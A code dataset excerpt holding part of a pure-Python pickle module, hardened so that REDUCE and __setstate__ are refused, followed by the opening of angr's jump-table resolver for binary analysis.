self.save(pid, save_persistent_id=False)
self.write(BINPERSID)
else:
try:
self.write(PERSID + str(pid).encode("ascii") + b'\n')
except UnicodeEncodeError:
raise PicklingError(
"persistent IDs in protocol 0 must be ASCII strings")
def save_reduce(self, func, args, state=None, listitems=None,
dictitems=None, obj=None):
# This API is called by some subclasses
if not isinstance(args, tuple):
raise PicklingError("args from save_reduce() must be a tuple")
if not callable(func):
raise PicklingError("func from save_reduce() must be callable")
save = self.save
write = self.write
func_name = getattr(func, "__name__", "")
if self.proto >= 2 and func_name == "__newobj_ex__":
cls, args, kwargs = args
if not hasattr(cls, "__new__"):
raise PicklingError("args[0] from {} args has no __new__"
.format(func_name))
if obj is not None and cls is not obj.__class__:
raise PicklingError("args[0] from {} args has the wrong class"
.format(func_name))
if self.proto >= 4:
save(cls)
save(args)
save(kwargs)
write(NEWOBJ_EX)
else:
func = partial(cls.__new__, cls, *args, **kwargs)
save(func)
save(())
write(REDUCE)
elif self.proto >= 2 and func_name == "__newobj__":
# A __reduce__ implementation can direct protocol 2 or newer to
# use the more efficient NEWOBJ opcode, while still
# allowing protocol 0 and 1 to work normally. For this to
# work, the function returned by __reduce__ should be
# called __newobj__, and its first argument should be a
# class. The implementation for __newobj__
# should be as follows, although pickle has no way to
# verify this:
#
# def __newobj__(cls, *args):
# return cls.__new__(cls, *args)
#
# Protocols 0 and 1 will pickle a reference to __newobj__,
# while protocol 2 (and above) will pickle a reference to
# cls, the remaining args tuple, and the NEWOBJ code,
# which calls cls.__new__(cls, *args) at unpickling time
# (see load_newobj below). If __reduce__ returns a
# three-tuple, the state from the third tuple item will be
# pickled regardless of the protocol, calling __setstate__
# at unpickling time (see load_build below).
#
# Note that no standard __newobj__ implementation exists;
# you have to provide your own. This is to enforce
# compatibility with Python 2.2 (pickles written using
# protocol 0 or 1 in Python 2.3 should be unpicklable by
# Python 2.2).
cls = args[0]
if not hasattr(cls, "__new__"):
raise PicklingError(
"args[0] from __newobj__ args has no __new__")
if obj is not None and cls is not obj.__class__:
raise PicklingError(
"args[0] from __newobj__ args has the wrong class")
args = args[1:]
save(cls)
save(args)
write(NEWOBJ)
else:
save(func)
save(args)
write(REDUCE)
if obj is not None:
# If the object is already in the memo, this means it is
# recursive. In this case, throw away everything we put on the
# stack, and fetch the object back from the memo.
if id(obj) in self.memo:
write(POP + self.get(self.memo[id(obj)][0]))
else:
self.memoize(obj)
# More new special cases (that work with older protocols as
# well): when __reduce__ returns a tuple with 4 or 5 items,
# the 4th and 5th item should be iterators that provide list
# items and dict items (as (key, value) tuples), or None.
if listitems is not None:
self._batch_appends(listitems)
if dictitems is not None:
self._batch_setitems(dictitems)
if state is not None:
save(state)
write(BUILD)
# Methods below this point are dispatched through the dispatch table
dispatch = {}
def save_none(self, obj):
self.write(NONE)
dispatch[type(None)] = save_none
def save_bool(self, obj):
if self.proto >= 2:
self.write(NEWTRUE if obj else NEWFALSE)
else:
self.write(TRUE if obj else FALSE)
dispatch[bool] = save_bool
def save_long(self, obj):
if self.bin:
# If the int is small enough to fit in a signed 4-byte 2's-comp
# format, we can store it more efficiently than the general
# case.
# First one- and two-byte unsigned ints:
if obj >= 0:
if obj <= 0xff:
self.write(BININT1 + pack("<B", obj))
return
if obj <= 0xffff:
self.write(BININT2 + pack("<H", obj))
return
# Next check for 4-byte signed ints:
if -0x80000000 <= obj <= 0x7fffffff:
self.write(BININT + pack("<i", obj))
return
if self.proto >= 2:
encoded = encode_long(obj)
n = len(encoded)
if n < 256:
self.write(LONG1 + pack("<B", n) + encoded)
else:
self.write(LONG4 + pack("<i", n) + encoded)
return
if -0x80000000 <= obj <= 0x7fffffff:
self.write(INT + repr(obj).encode("ascii") + b'\n')
else:
self.write(LONG + repr(obj).encode("ascii") + b'L\n')
dispatch[int] = save_long
def save_float(self, obj):
if self.bin:
self.write(BINFLOAT + pack('>d', obj))
else:
self.write(FLOAT + repr(obj).encode("ascii") + b'\n')
dispatch[float] = save_float
def save_bytes(self, obj):
if self.proto < 3:
if not obj: # bytes object is empty
self.save_reduce(bytes, (), obj=obj)
else:
self.save_reduce(codecs.encode,
(str(obj, 'latin1'), 'latin1'), obj=obj)
return
n = len(obj)
if n <= 0xff:
self.write(SHORT_BINBYTES + pack("<B", n) + obj)
elif n > 0xffffffff and self.proto >= 4:
self._write_large_bytes(BINBYTES8 + pack("<Q", n), obj)
elif n >= self.framer._FRAME_SIZE_TARGET:
self._write_large_bytes(BINBYTES + pack("<I", n), obj)
else:
self.write(BINBYTES + pack("<I", n) + obj)
self.memoize(obj)
dispatch[bytes] = save_bytes
def save_str(self, obj):
if self.bin:
encoded = obj.encode('utf-8', 'surrogatepass')
n = len(encoded)
if n <= 0xff and self.proto >= 4:
self.write(SHORT_BINUNICODE + pack("<B", n) + encoded)
elif n > 0xffffffff and self.proto >= 4:
self._write_large_bytes(BINUNICODE8 + pack("<Q", n), encoded)
elif n >= self.framer._FRAME_SIZE_TARGET:
self._write_large_bytes(BINUNICODE + pack("<I", n), encoded)
else:
self.write(BINUNICODE + pack("<I", n) + encoded)
else:
obj = obj.replace("\\", "\\u005c")
obj = obj.replace("\n", "\\u000a")
self.write(UNICODE + obj.encode('raw-unicode-escape') +
b'\n')
self.memoize(obj)
dispatch[str] = save_str
def save_tuple(self, obj):
if not obj: # tuple is empty
if self.bin:
self.write(EMPTY_TUPLE)
else:
self.write(MARK + TUPLE)
return
n = len(obj)
save = self.save
memo = self.memo
if n <= 3 and self.proto >= 2:
for element in obj:
save(element)
# Subtle. Same as in the big comment below.
if id(obj) in memo:
get = self.get(memo[id(obj)][0])
self.write(POP * n + get)
else:
self.write(_tuplesize2code[n])
self.memoize(obj)
return
# proto 0 or proto 1 and tuple isn't empty, or proto > 1 and tuple
# has more than 3 elements.
write = self.write
write(MARK)
for element in obj:
save(element)
if id(obj) in memo:
# Subtle. d was not in memo when we entered save_tuple(), so
# the process of saving the tuple's elements must have saved
# the tuple itself: the tuple is recursive. The proper action
# now is to throw away everything we put on the stack, and
# simply GET the tuple (it's already constructed). This check
# could have been done in the "for element" loop instead, but
# recursive tuples are a rare thing.
get = self.get(memo[id(obj)][0])
if self.bin:
write(POP_MARK + get)
else: # proto 0 -- POP_MARK not available
write(POP * (n + 1) + get)
return
# No recursion.
write(TUPLE)
self.memoize(obj)
dispatch[tuple] = save_tuple
def save_list(self, obj):
if self.bin:
self.write(EMPTY_LIST)
else: # proto 0 -- can't use EMPTY_LIST
self.write(MARK + LIST)
self.memoize(obj)
self._batch_appends(obj)
dispatch[list] = save_list
_BATCHSIZE = 1000
def _batch_appends(self, items):
# Helper to batch up APPENDS sequences
save = self.save
write = self.write
if not self.bin:
for x in items:
save(x)
write(APPEND)
return
it = iter(items)
while True:
tmp = list(islice(it, self._BATCHSIZE))
n = len(tmp)
if n > 1:
write(MARK)
for x in tmp:
save(x)
write(APPENDS)
elif n:
save(tmp[0])
write(APPEND)
# else tmp is empty, and we're done
if n < self._BATCHSIZE:
return
def save_dict(self, obj):
if self.bin:
self.write(EMPTY_DICT)
else: # proto 0 -- can't use EMPTY_DICT
self.write(MARK + DICT)
self.memoize(obj)
self._batch_setitems(obj.items())
dispatch[dict] = save_dict
if PyStringMap is not None:
dispatch[PyStringMap] = save_dict
def _batch_setitems(self, items):
# Helper to batch up SETITEMS sequences; proto >= 1 only
save = self.save
write = self.write
if not self.bin:
for k, v in items:
save(k)
save(v)
write(SETITEM)
return
it = iter(items)
while True:
tmp = list(islice(it, self._BATCHSIZE))
n = len(tmp)
if n > 1:
write(MARK)
for k, v in tmp:
save(k)
save(v)
write(SETITEMS)
elif n:
k, v = tmp[0]
save(k)
save(v)
write(SETITEM)
# else tmp is empty, and we're done
if n < self._BATCHSIZE:
return
def save_set(self, obj):
save = self.save
write = self.write
if self.proto < 4:
self.save_reduce(set, (list(obj),), obj=obj)
return
write(EMPTY_SET)
self.memoize(obj)
it = iter(obj)
while True:
batch = list(islice(it, self._BATCHSIZE))
n = len(batch)
if n > 0:
write(MARK)
for item in batch:
save(item)
write(ADDITEMS)
if n < self._BATCHSIZE:
return
dispatch[set] = save_set
def save_frozenset(self, obj):
save = self.save
write = self.write
if self.proto < 4:
self.save_reduce(frozenset, (list(obj),), obj=obj)
return
write(MARK)
for item in obj:
save(item)
if id(obj) in self.memo:
# If the object is already in the memo, this means it is
# recursive. In this case, throw away everything we put on the
# stack, and fetch the object back from the memo.
write(POP_MARK + self.get(self.memo[id(obj)][0]))
return
write(FROZENSET)
self.memoize(obj)
dispatch[frozenset] = save_frozenset
def save_global(self, obj, name=None):
write = self.write
memo = self.memo
if name is None:
name = getattr(obj, '__qualname__', None)
if name is None:
name = obj.__name__
module_name = whichmodule(obj, name)
try:
__import__(module_name, level=0)
module = sys.modules[module_name]
obj2, parent = _getattribute(module, name)
except (ImportError, KeyError, AttributeError):
raise PicklingError(
"Can't pickle %r: it's not found as %s.%s" %
(obj, module_name, name)) from None
else:
if obj2 is not obj:
raise PicklingError(
"Can't pickle %r: it's not the same object as %s.%s" %
(obj, module_name, name))
if self.proto >= 2:
code = _extension_registry.get((module_name, name))
if code:
assert code > 0
if code <= 0xff:
write(EXT1 + pack("<B", code))
elif code <= 0xffff:
write(EXT2 + pack("<H", code))
else:
write(EXT4 + pack("<i", code))
return
lastname = name.rpartition('.')[2]
if parent is module:
name = lastname
# Non-ASCII identifiers are supported only with protocols >= 3.
if self.proto >= 4:
self.save(module_name)
self.save(name)
write(STACK_GLOBAL)
elif parent is not module:
self.save_reduce(getattr, (parent, lastname))
elif self.proto >= 3:
write(GLOBAL + bytes(module_name, "utf-8") + b'\n' +
bytes(name, "utf-8") + b'\n')
else:
if self.fix_imports:
r_name_mapping = _compat_pickle.REVERSE_NAME_MAPPING
r_import_mapping = _compat_pickle.REVERSE_IMPORT_MAPPING
if (module_name, name) in r_name_mapping:
module_name, name = r_name_mapping[(module_name, name)]
elif module_name in r_import_mapping:
module_name = r_import_mapping[module_name]
try:
write(GLOBAL + bytes(module_name, "ascii") + b'\n' +
bytes(name, "ascii") + b'\n')
except UnicodeEncodeError:
raise PicklingError(
"can't pickle global identifier '%s.%s' using "
"pickle protocol %i" % (module, name, self.proto)) from None
self.memoize(obj)
def save_type(self, obj):
if obj is type(None):
return self.save_reduce(type, (None,), obj=obj)
elif obj is type(NotImplemented):
return self.save_reduce(type, (NotImplemented,), obj=obj)
elif obj is type(...):
return self.save_reduce(type, (...,), obj=obj)
return self.save_global(obj)
dispatch[FunctionType] = save_global
dispatch[type] = save_type
# Unpickling machinery
class _Unpickler:
def __init__(self, file, *, fix_imports=True,
encoding="ASCII", errors="strict"):
"""This takes a binary file for reading a pickle data stream.
The protocol version of the pickle is detected automatically, so
no proto argument is needed.
The argument *file* must have two methods, a read() method that
takes an integer argument, and a readline() method that requires
no arguments. Both methods should return bytes. Thus *file*
can be a binary file object opened for reading, an io.BytesIO
object, or any other custom object that meets this interface.
The file-like object must have two methods, a read() method
that takes an integer argument, and a readline() method that
requires no arguments. Both methods should return bytes.
Thus file-like object can be a binary file object opened for
reading, a BytesIO object, or any other custom object that
meets this interface.
Optional keyword arguments are *fix_imports*, *encoding* and
*errors*, which are used to control compatibility support for
pickle stream generated by Python 2. If *fix_imports* is True,
pickle will try to map the old Python 2 names to the new names
used in Python 3. The *encoding* and *errors* tell pickle how
to decode 8-bit string instances pickled by Python 2; these
default to 'ASCII' and 'strict', respectively. *encoding* can be
'bytes' to read theses 8-bit string instances as bytes objects.
"""
self._file_readline = file.readline
self._file_read = file.read
self.memo = {}
self.encoding = encoding
self.errors = errors
self.proto = 0
self.fix_imports = fix_imports
def load(self):
"""Read a pickled object representation from the open file.
Return the reconstituted object hierarchy specified in the file.
"""
# Check whether Unpickler was initialized correctly. This is
# only needed to mimic the behavior of _pickle.Unpickler.dump().
if not hasattr(self, "_file_read"):
raise UnpicklingError("Unpickler.__init__() was not called by "
"%s.__init__()" % (self.__class__.__name__,))
self._unframer = _Unframer(self._file_read, self._file_readline)
self.read = self._unframer.read
self.readline = self._unframer.readline
self.metastack = []
self.stack = []
self.append = self.stack.append
self.proto = 0
read = self.read
dispatch = self.dispatch
try:
while True:
key = read(1)
if not key:
raise EOFError
assert isinstance(key, bytes_types)
dispatch[key[0]](self)
except _Stop as stopinst:
return stopinst.value
# Return a list of items pushed in the stack after last MARK instruction.
def pop_mark(self):
items = self.stack
self.stack = self.metastack.pop()
self.append = self.stack.append
return items
def persistent_load(self, pid):
raise UnpicklingError("unsupported persistent id encountered")
dispatch = {}
def load_proto(self):
proto = self.read(1)[0]
if not 0 <= proto <= HIGHEST_PROTOCOL:
raise ValueError("unsupported pickle protocol: %d" % proto)
self.proto = proto
dispatch[PROTO[0]] = load_proto
def load_frame(self):
frame_size, = unpack('<Q', self.read(8))
if frame_size > sys.maxsize:
raise ValueError("frame size > sys.maxsize: %d" % frame_size)
self._unframer.load_frame(frame_size)
dispatch[FRAME[0]] = load_frame
def load_persid(self):
try:
pid = self.readline()[:-1].decode("ascii")
except UnicodeDecodeError:
raise UnpicklingError(
"persistent IDs in protocol 0 must be ASCII strings")
self.append(self.persistent_load(pid))
dispatch[PERSID[0]] = load_persid
def load_binpersid(self):
pid = self.stack.pop()
self.append(self.persistent_load(pid))
dispatch[BINPERSID[0]] = load_binpersid
def load_none(self):
self.append(None)
dispatch[NONE[0]] = load_none
def load_false(self):
self.append(False)
dispatch[NEWFALSE[0]] = load_false
def load_true(self):
self.append(True)
dispatch[NEWTRUE[0]] = load_true
def load_int(self):
data = self.readline()
if data == FALSE[1:]:
val = False
elif data == TRUE[1:]:
val = True
else:
val = int(data, 0)
self.append(val)
dispatch[INT[0]] = load_int
def load_binint(self):
self.append(unpack('<i', self.read(4))[0])
dispatch[BININT[0]] = load_binint
def load_binint1(self):
self.append(self.read(1)[0])
dispatch[BININT1[0]] = load_binint1
def load_binint2(self):
self.append(unpack('<H', self.read(2))[0])
dispatch[BININT2[0]] = load_binint2
def load_long(self):
val = self.readline()[:-1]
if val and val[-1] == b'L'[0]:
val = val[:-1]
self.append(int(val, 0))
dispatch[LONG[0]] = load_long
def load_long1(self):
n = self.read(1)[0]
data = self.read(n)
self.append(decode_long(data))
dispatch[LONG1[0]] = load_long1
def load_long4(self):
n, = unpack('<i', self.read(4))
if n < 0:
# Corrupt or hostile pickle -- we never write one like this
raise UnpicklingError("LONG pickle has negative byte count")
data = self.read(n)
self.append(decode_long(data))
dispatch[LONG4[0]] = load_long4
def load_float(self):
self.append(float(self.readline()[:-1]))
dispatch[FLOAT[0]] = load_float
def load_binfloat(self):
self.append(unpack('>d', self.read(8))[0])
dispatch[BINFLOAT[0]] = load_binfloat
def _decode_string(self, value):
# Used to allow strings from Python 2 to be decoded either as
# bytes or Unicode strings. This should be used only with the
# STRING, BINSTRING and SHORT_BINSTRING opcodes.
if self.encoding == "bytes":
return value
else:
return value.decode(self.encoding, self.errors)
def load_string(self):
data = self.readline()[:-1]
# Strip outermost quotes
if len(data) >= 2 and data[0] == data[-1] and data[0] in b'"\'':
data = data[1:-1]
else:
raise UnpicklingError("the STRING opcode argument must be quoted")
self.append(self._decode_string(codecs.escape_decode(data)[0]))
dispatch[STRING[0]] = load_string
def load_binstring(self):
# Deprecated BINSTRING uses signed 32-bit length
len, = unpack('<i', self.read(4))
if len < 0:
raise UnpicklingError("BINSTRING pickle has negative byte count")
data = self.read(len)
self.append(self._decode_string(data))
dispatch[BINSTRING[0]] = load_binstring
def load_binbytes(self):
len, = unpack('<I', self.read(4))
if len > maxsize:
raise UnpicklingError("BINBYTES exceeds system's maximum size "
"of %d bytes" % maxsize)
self.append(self.read(len))
dispatch[BINBYTES[0]] = load_binbytes
def load_unicode(self):
self.append(str(self.readline()[:-1], 'raw-unicode-escape'))
dispatch[UNICODE[0]] = load_unicode
def load_binunicode(self):
len, = unpack('<I', self.read(4))
if len > maxsize:
raise UnpicklingError("BINUNICODE exceeds system's maximum size "
"of %d bytes" % maxsize)
self.append(str(self.read(len), 'utf-8', 'surrogatepass'))
dispatch[BINUNICODE[0]] = load_binunicode
def load_binunicode8(self):
len, = unpack('<Q', self.read(8))
if len > maxsize:
raise UnpicklingError("BINUNICODE8 exceeds system's maximum size "
"of %d bytes" % maxsize)
self.append(str(self.read(len), 'utf-8', 'surrogatepass'))
dispatch[BINUNICODE8[0]] = load_binunicode8
def load_binbytes8(self):
len, = unpack('<Q', self.read(8))
if len > maxsize:
raise UnpicklingError("BINBYTES8 exceeds system's maximum size "
"of %d bytes" % maxsize)
self.append(self.read(len))
dispatch[BINBYTES8[0]] = load_binbytes8
def load_short_binstring(self):
len = self.read(1)[0]
data = self.read(len)
self.append(self._decode_string(data))
dispatch[SHORT_BINSTRING[0]] = load_short_binstring
def load_short_binbytes(self):
len = self.read(1)[0]
self.append(self.read(len))
dispatch[SHORT_BINBYTES[0]] = load_short_binbytes
def load_short_binunicode(self):
len = self.read(1)[0]
self.append(str(self.read(len), 'utf-8', 'surrogatepass'))
dispatch[SHORT_BINUNICODE[0]] = load_short_binunicode
def load_tuple(self):
items = self.pop_mark()
self.append(tuple(items))
dispatch[TUPLE[0]] = load_tuple
def load_empty_tuple(self):
self.append(())
dispatch[EMPTY_TUPLE[0]] = load_empty_tuple
def load_tuple1(self):
self.stack[-1] = (self.stack[-1],)
dispatch[TUPLE1[0]] = load_tuple1
def load_tuple2(self):
self.stack[-2:] = [(self.stack[-2], self.stack[-1])]
dispatch[TUPLE2[0]] = load_tuple2
def load_tuple3(self):
self.stack[-3:] = [(self.stack[-3], self.stack[-2], self.stack[-1])]
dispatch[TUPLE3[0]] = load_tuple3
def load_empty_list(self):
self.append([])
dispatch[EMPTY_LIST[0]] = load_empty_list
def load_empty_dictionary(self):
self.append({})
dispatch[EMPTY_DICT[0]] = load_empty_dictionary
def load_empty_set(self):
self.append(set())
dispatch[EMPTY_SET[0]] = load_empty_set
def load_frozenset(self):
items = self.pop_mark()
self.append(frozenset(items))
dispatch[FROZENSET[0]] = load_frozenset
def load_list(self):
items = self.pop_mark()
self.append(items)
dispatch[LIST[0]] = load_list
def load_dict(self):
items = self.pop_mark()
d = {items[i]: items[i + 1]
for i in range(0, len(items), 2)}
self.append(d)
dispatch[DICT[0]] = load_dict
# INST and OBJ differ only in how they get a class object. It's not
# only sensible to do the rest in a utils routine, the two routines
# previously diverged and grew different bugs.
# klass is the class to instantiate, and k points to the topmost mark
# object, following which are the arguments for klass.__init__.
def _instantiate(self, klass, args):
if (args or not isinstance(klass, type) or
hasattr(klass, "__getinitargs__")):
try:
value = klass(*args)
except TypeError as err:
raise TypeError("in constructor for %s: %s" %
(klass.__name__, str(err)), sys.exc_info()[2])
else:
value = klass.__new__(klass)
self.append(value)
def load_inst(self):
module = self.readline()[:-1].decode("ascii")
name = self.readline()[:-1].decode("ascii")
klass = self.find_class(module, name)
self._instantiate(klass, self.pop_mark())
dispatch[INST[0]] = load_inst
def load_obj(self):
# Stack is ... markobject classobject arg1 arg2 ...
args = self.pop_mark()
cls = args.pop(0)
self._instantiate(cls, args)
dispatch[OBJ[0]] = load_obj
def load_newobj(self):
args = self.stack.pop()
cls = self.stack.pop()
obj = cls.__new__(cls, *args)
self.append(obj)
dispatch[NEWOBJ[0]] = load_newobj
def load_newobj_ex(self):
kwargs = self.stack.pop()
args = self.stack.pop()
cls = self.stack.pop()
obj = cls.__new__(cls, *args, **kwargs)
self.append(obj)
dispatch[NEWOBJ_EX[0]] = load_newobj_ex
def load_global(self):
module = self.readline()[:-1].decode("utf-8")
name = self.readline()[:-1].decode("utf-8")
klass = self.find_class(module, name)
self.append(klass)
dispatch[GLOBAL[0]] = load_global
def load_stack_global(self):
name = self.stack.pop()
module = self.stack.pop()
if type(name) is not str or type(module) is not str:
raise UnpicklingError("STACK_GLOBAL requires str")
self.append(self.find_class(module, name))
dispatch[STACK_GLOBAL[0]] = load_stack_global
def load_ext1(self):
code = self.read(1)[0]
self.get_extension(code)
dispatch[EXT1[0]] = load_ext1
def load_ext2(self):
code, = unpack('<H', self.read(2))
self.get_extension(code)
dispatch[EXT2[0]] = load_ext2
def load_ext4(self):
code, = unpack('<i', self.read(4))
self.get_extension(code)
dispatch[EXT4[0]] = load_ext4
def get_extension(self, code):
nil = []
obj = _extension_cache.get(code, nil)
if obj is not nil:
self.append(obj)
return
key = _inverted_registry.get(code)
if not key:
if code <= 0: # note that 0 is forbidden
# Corrupt or hostile pickle.
raise UnpicklingError("EXT specifies code <= 0")
raise ValueError("unregistered extension code %d" % code)
obj = self.find_class(*key)
_extension_cache[code] = obj
self.append(obj)
def find_class(self, module, name):
# Subclasses may override this.
if self.proto < 3 and self.fix_imports:
if (module, name) in _compat_pickle.NAME_MAPPING:
module, name = _compat_pickle.NAME_MAPPING[(module, name)]
elif module in _compat_pickle.IMPORT_MAPPING:
module = _compat_pickle.IMPORT_MAPPING[module]
__import__(module, level=0)
if self.proto >= 4:
return _getattribute(sys.modules[module], name)[0]
else:
return getattr(sys.modules[module], name)
def load_reduce(self):
raise ValueError('object is forbidden to override reduce for security concern')
# stack = self.stack
# args = stack.pop()
# func = stack[-1]
# stack[-1] = func(*args)
dispatch[REDUCE[0]] = load_reduce
def load_pop(self):
if self.stack:
del self.stack[-1]
else:
self.pop_mark()
dispatch[POP[0]] = load_pop
def load_pop_mark(self):
self.pop_mark()
dispatch[POP_MARK[0]] = load_pop_mark
def load_dup(self):
self.append(self.stack[-1])
dispatch[DUP[0]] = load_dup
def load_get(self):
i = int(self.readline()[:-1])
self.append(self.memo[i])
dispatch[GET[0]] = load_get
def load_binget(self):
i = self.read(1)[0]
self.append(self.memo[i])
dispatch[BINGET[0]] = load_binget
def load_long_binget(self):
i, = unpack('<I', self.read(4))
self.append(self.memo[i])
dispatch[LONG_BINGET[0]] = load_long_binget
def load_put(self):
i = int(self.readline()[:-1])
if i < 0:
raise ValueError("negative PUT argument")
self.memo[i] = self.stack[-1]
dispatch[PUT[0]] = load_put
def load_binput(self):
i = self.read(1)[0]
if i < 0:
raise ValueError("negative BINPUT argument")
self.memo[i] = self.stack[-1]
dispatch[BINPUT[0]] = load_binput
def load_long_binput(self):
i, = unpack('<I', self.read(4))
if i > maxsize:
raise ValueError("negative LONG_BINPUT argument")
self.memo[i] = self.stack[-1]
dispatch[LONG_BINPUT[0]] = load_long_binput
def load_memoize(self):
memo = self.memo
memo[len(memo)] = self.stack[-1]
dispatch[MEMOIZE[0]] = load_memoize
def load_append(self):
stack = self.stack
value = stack.pop()
list = stack[-1]
list.append(value)
dispatch[APPEND[0]] = load_append
def load_appends(self):
items = self.pop_mark()
list_obj = self.stack[-1]
try:
extend = list_obj.extend
except AttributeError:
pass
else:
extend(items)
return
# Even if the PEP 307 requires extend() and append() methods,
# fall back on append() if the object has no extend() method
# for backward compatibility.
append = list_obj.append
for item in items:
append(item)
dispatch[APPENDS[0]] = load_appends
def load_setitem(self):
stack = self.stack
value = stack.pop()
key = stack.pop()
dict = stack[-1]
dict[key] = value
dispatch[SETITEM[0]] = load_setitem
def load_setitems(self):
items = self.pop_mark()
dict = self.stack[-1]
for i in range(0, len(items), 2):
dict[items[i]] = items[i + 1]
dispatch[SETITEMS[0]] = load_setitems
def load_additems(self):
items = self.pop_mark()
set_obj = self.stack[-1]
if isinstance(set_obj, set):
set_obj.update(items)
else:
add = set_obj.add
for item in items:
add(item)
dispatch[ADDITEMS[0]] = load_additems
def load_build(self):
stack = self.stack
state = stack.pop()
inst = stack[-1]
setstate = getattr(inst, "__setstate__", None)
if setstate is not None:
raise ValueError('object is forbidden to override setstate for security concern')
# setstate(state)
# return
slotstate = None
if isinstance(state, tuple) and len(state) == 2:
state, slotstate = state
if state:
inst_dict = inst.__dict__
intern = sys.intern
for k, v in state.items():
if type(k) is str:
inst_dict[intern(k)] = v
else:
inst_dict[k] = v
if slotstate:
for k, v in slotstate.items():
setattr(inst, k, v)
dispatch[BUILD[0]] = load_build
def load_mark(self):
self.metastack.append(self.stack)
self.stack = []
self.append = self.stack.append
dispatch[MARK[0]] = load_mark
def load_stop(self):
value = self.stack.pop()
raise _Stop(value)
dispatch[STOP[0]] = load_stop
# Shorthands
def _dump(obj, file, protocol=None, *, fix_imports=True):
_Pickler(file, protocol, fix_imports=fix_imports).dump(obj)
def _dumps(obj, protocol=None, *, fix_imports=True):
f = io.BytesIO()
_Pickler(f, protocol, fix_imports=fix_imports).dump(obj)
res = f.getvalue()
assert isinstance(res, bytes_types)
return res
def _load(file, *, fix_imports=True, encoding="ASCII", errors="strict"):
return _Unpickler(file, fix_imports=fix_imports,
encoding=encoding, errors=errors).load()
def _loads(s, *, fix_imports=True, encoding="ASCII", errors="strict"):
if isinstance(s, str):
raise TypeError("Can't load pickle from unicode string")
file = io.BytesIO(s)
return _Unpickler(file, fix_imports=fix_imports,
encoding=encoding, errors=errors).load()
Pickler, Unpickler = _Pickler, _Unpickler
dump, dumps, load, loads = _dump, _dumps, _load, _loads
# Doctest
def _test():
import doctest
return doctest.testmod()
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(
description='display contents of the pickle files')
parser.add_argument(
'pickle_file', type=argparse.FileType('br'),
nargs='*', help='the pickle file')
parser.add_argument(
'-t', '--test', action='store_true',
help='run self-test suite')
parser.add_argument(
'-v', action='store_true',
help='run verbosely; only affects self-test run')
args = parser.parse_args()
if args.test:
_test()
else:
if not args.pickle_file:
parser.print_help()
else:
import pprint
for f in args.pickle_file:
obj = load(f)
pprint.pprint(obj)
|
py | 7dfaa272a59507854349da9175fbcbe930618d9d | from typing import Tuple, Optional, Dict
import logging
from collections import defaultdict, OrderedDict
import pyvex
import claripy
from archinfo.arch_arm import is_arm_arch
from ....concretization_strategies import SimConcretizationStrategyAny
from ....knowledge_plugins.cfg import IndirectJump, IndirectJumpType
from ....engines.vex.claripy import ccall
from ....engines.light import SimEngineLightVEXMixin, SimEngineLight, SpOffset, RegisterOffset
from ....errors import AngrError, SimError
from ....blade import Blade
from ....annocfg import AnnotatedCFG
from .... import sim_options as o
from .... import BP, BP_BEFORE, BP_AFTER
from ....exploration_techniques.slicecutor import Slicecutor
from ....exploration_techniques.explorer import Explorer
from ....utils.constants import DEFAULT_STATEMENT
from .resolver import IndirectJumpResolver
from ....misc.ux import once
try:
from ....engines import pcode
except ImportError:
pcode = None
l = logging.getLogger(name=__name__)
class NotAJumpTableNotification(AngrError):
pass
class UninitReadMeta:
uninit_read_base = 0xc000000
class AddressTransferringTypes:
Assignment = 0
SignedExtension = 1
UnsignedExtension = 2
Truncation = 3
Or1 = 4
ShiftLeft = 5
class JumpTargetBaseAddr:
def __init__(self, stmt_loc, stmt, tmp, base_addr=None, tmp_1=None):
self.stmt_loc = stmt_loc
self.stmt = stmt
self.tmp = tmp # type:int
self.tmp_1 = tmp_1
self.base_addr = base_addr # type:int
assert base_addr is not None or tmp_1 is not None
@property
def base_addr_available(self):
return self.base_addr is not None
#
# Jump table pre-check
#
_x86_ct = ccall.data['X86']['CondTypes']
_amd64_ct = ccall.data['AMD64']['CondTypes']
EXPECTED_COND_TYPES = {
'X86': {
_x86_ct['CondB'],
_x86_ct['CondNB'],
_x86_ct['CondBE'],
_x86_ct['CondNBE'],
_x86_ct['CondL'],
_x86_ct['CondNL'],
_x86_ct['CondLE'],
_x86_ct['CondNLE'],
},
'AMD64': {
_amd64_ct['CondB'],
_amd64_ct['CondNB'],
_amd64_ct['CondBE'],
_amd64_ct['CondNBE'],
_amd64_ct['CondL'],
_amd64_ct['CondNL'],
_amd64_ct['CondLE'],
_amd64_ct['CondNLE'],
},
'ARM': {
ccall.ARMCondHS,
ccall.ARMCondLO,
ccall.ARMCondHI,
ccall.ARMCondLS,
ccall.ARMCondGE,
ccall.ARMCondLT,
ccall.ARMCondGT,
ccall.ARMCondLE,
},
'AARCH64': {
ccall.ARM64CondCS,
ccall.ARM64CondCC,
ccall.ARM64CondHI,
ccall.ARM64CondLS,
ccall.ARM64CondGE,
ccall.ARM64CondLT,
ccall.ARM64CondGT,
ccall.ARM64CondLE,
},
}
class JumpTableProcessorState:
"""
The state used in JumpTableProcessor.
"""
__slots__ = ('arch', '_registers', '_stack', '_tmpvar_source', 'is_jumptable', 'stmts_to_instrument',
'regs_to_initialize', )
def __init__(self, arch):
self.arch = arch
self._registers = {}
self._stack = {}
self._tmpvar_source = {} # a mapping from temporary variables to their origins
self.is_jumptable = None # is the current slice representing a jump table?
self.stmts_to_instrument = [ ] # Store/Put statements that we should instrument
self.regs_to_initialize = [ ] # registers that we should initialize
class RegOffsetAnnotation(claripy.Annotation):
__slots__ = ('reg_offset', )
def __init__(self, reg_offset: RegisterOffset):
self.reg_offset = reg_offset
@property
def relocatable(self):
return False
@property
def eliminatable(self):
return False
class JumpTableProcessor(
SimEngineLightVEXMixin,
SimEngineLight,
): # pylint:disable=abstract-method
"""
Implements a simple and stupid data dependency tracking for stack and register variables.
Also determines which statements to instrument during static execution of the slice later. For example, the
following example is not uncommon in non-optimized binaries::
mov [rbp+var_54], 1
loc_4051a6:
cmp [rbp+var_54], 6
ja loc_405412 (default)
loc_4051b0:
mov eax, [rbp+var_54]
mov rax, qword [rax*8+0x223a01]
jmp rax
We want to instrument the first instruction and replace the constant 1 with a symbolic variable, otherwise we will
not be able to recover all jump targets later in block 0x4051b0.
"""
def __init__(self, project, bp_sp_diff=0x100):
super().__init__()
self.project = project
self._bp_sp_diff = bp_sp_diff # bp - sp
self._tsrc = set() # a scratch variable to store source information for values
self._SPOFFSET_BASE = claripy.BVS('SpOffset', self.project.arch.bits, explicit_name=True)
self._REGOFFSET_BASE: Dict[int,claripy.ast.BV] = {}
@staticmethod
def _top(size: int):
return None
@staticmethod
def _is_top(expr) -> bool:
return expr is None
